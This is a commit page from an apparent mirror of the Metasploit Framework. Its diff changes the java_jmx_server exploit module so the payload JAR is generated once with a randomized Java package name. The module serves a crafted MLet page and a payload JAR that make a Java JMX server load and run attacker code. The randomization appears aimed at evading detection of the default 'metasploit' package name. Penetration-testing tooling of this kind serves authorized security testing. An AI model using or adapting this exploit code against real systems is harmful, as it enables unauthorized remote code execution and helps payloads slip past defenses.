infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #9896, Java JMX Package Name Randomization 

Land #9896
4.x
Wei Chen 2018-07-02 13:41:39 -05:00 committed by Metasploit
parent 709630e35c
commit d4054c24bd
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
1 changed files with 12 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

23
modules/exploits/multi/misc/java_jmx_server.rb
View File

@ -58,10 +58,20 @@ class MetasploitModule < Msf::Exploit::Remote
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
if @jar.nil?
p = regenerate_payload(cli)
@jar = p.encoded_jar({"random":true})
paths = [
["metasploit", "JMXPayloadMBean.class"],
["metasploit", "JMXPayload.class"],
]
@jar.add_files(paths, MetasploitPayloads.path('java'))
end
if request.uri =~ /mlet$/ if request.uri =~ /mlet$/
jar = "#{rand_text_alpha(8 + rand(8))}.jar" jar = "#{rand_text_alpha(8 + rand(8))}.jar"
mlet = "<HTML><mlet code=\"metasploit.JMXPayload\" " mlet = "<HTML><mlet code=\"#{@jar.substitutions["metasploit"]}.JMXPayload\" "
mlet << "archive=\"#{jar}\" " mlet << "archive=\"#{jar}\" "
mlet << "name=\"#{@mlet}:name=jmxpayload,id=1\" " mlet << "name=\"#{@mlet}:name=jmxpayload,id=1\" "
mlet << "codebase=\"#{get_uri}\"></mlet></HTML>" mlet << "codebase=\"#{get_uri}\"></mlet></HTML>"
@ -73,20 +83,11 @@ class MetasploitModule < Msf::Exploit::Remote
print_status("Replied to request for mlet") print_status("Replied to request for mlet")
elsif request.uri =~ /\.jar$/i elsif request.uri =~ /\.jar$/i
p = regenerate_payload(cli) send_response(cli, @jar.pack,
jar = p.encoded_jar
paths = [
["metasploit", "JMXPayloadMBean.class"],
["metasploit", "JMXPayload.class"],
]
jar.add_files(paths, MetasploitPayloads.path('java'))
send_response(cli, jar.pack,
{ {
'Content-Type' => 'application/java-archive', 'Content-Type' => 'application/java-archive',
'Pragma' => 'no-cache' 'Pragma' => 'no-cache'
}) })
print_status("Replied to request for payload JAR") print_status("Replied to request for payload JAR")
end end
end end